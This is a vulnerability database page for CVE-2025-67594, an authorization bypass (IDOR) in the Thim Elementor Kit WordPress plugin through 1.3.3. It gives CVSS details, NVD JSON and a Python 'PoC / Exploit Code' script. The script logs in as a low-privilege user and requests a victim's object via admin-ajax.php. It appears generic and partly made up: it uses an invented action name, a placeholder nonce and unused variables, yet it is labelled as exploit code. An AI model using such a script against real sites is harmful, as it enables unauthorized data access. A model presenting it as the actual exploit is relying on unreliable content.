Security Vulnerability Report
中文
CVE-2025-67594 CVSS 4.3 MEDIUM

CVE-2025-67594

Published: 2025-12-09 16:18:38
Last Modified: 2026-04-27 18:16:46

Description

Authorization Bypass Through User-Controlled Key vulnerability in ThimPress Thim Elementor Kit thim-elementor-kit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Thim Elementor Kit: from n/a through <= 1.3.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Thim Elementor Kit <= 1.3.3
Thim Elementor Kit 从开发版本到1.3.3的所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67594 PoC - Thim Elementor Kit IDOR Vulnerability # This PoC demonstrates the authorization bypass vulnerability import requests import sys TARGET_URL = "https://vulnerable-site.com" TARGET_ENDPOINT = "/wp-admin/admin-ajax.php" def exploit_idor_vulnerability(target_url, target_id, victim_id): """ Exploit IDOR vulnerability in Thim Elementor Kit Args: target_url: Target WordPress site URL target_id: Attacker-controlled object ID victim_id: Victim's object ID to access """ headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } # Login as low-privilege user and get nonce session = requests.Session() # Step 1: Authenticate with low-privilege account login_data = { "log": "low_privilege_user", "pwd": "password", "wp-submit": "Log In" } login_response = session.post( f"{target_url}/wp-login.php", data=login_data, allow_redirects=False ) if "wordpress_logged_in" not in session.cookies: print("[-] Login failed") return False print("[+] Successfully authenticated as low-privilege user") # Step 2: Exploit IDOR by manipulating object reference exploit_data = { "action": "thim_elementor_kit_action", "object_id": victim_id, # Victim's object ID "thim_nonce": "attacker_obtained_nonce" } exploit_response = session.post( f"{target_url}{TARGET_ENDPOINT}", data=exploit_data, headers=headers ) if exploit_response.status_code == 200: print("[+] IDOR exploitation successful!") print(f"[+] Retrieved data for victim object: {victim_id}") print(f"[+] Response: {exploit_response.text[:500]}") return True else: print("[-] Exploitation failed") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python poc.py <target_url> <target_id> <victim_id>") sys.exit(1) exploit_idor_vulnerability(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67594", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:37.613", "lastModified": "2026-04-27T18:16:45.770", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in ThimPress Thim Elementor Kit thim-elementor-kit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Thim Elementor Kit: from n/a through <= 1.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/thim-elementor-kit/vulnerability/wordpress-thim-elementor-kit-plugin-1-3-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}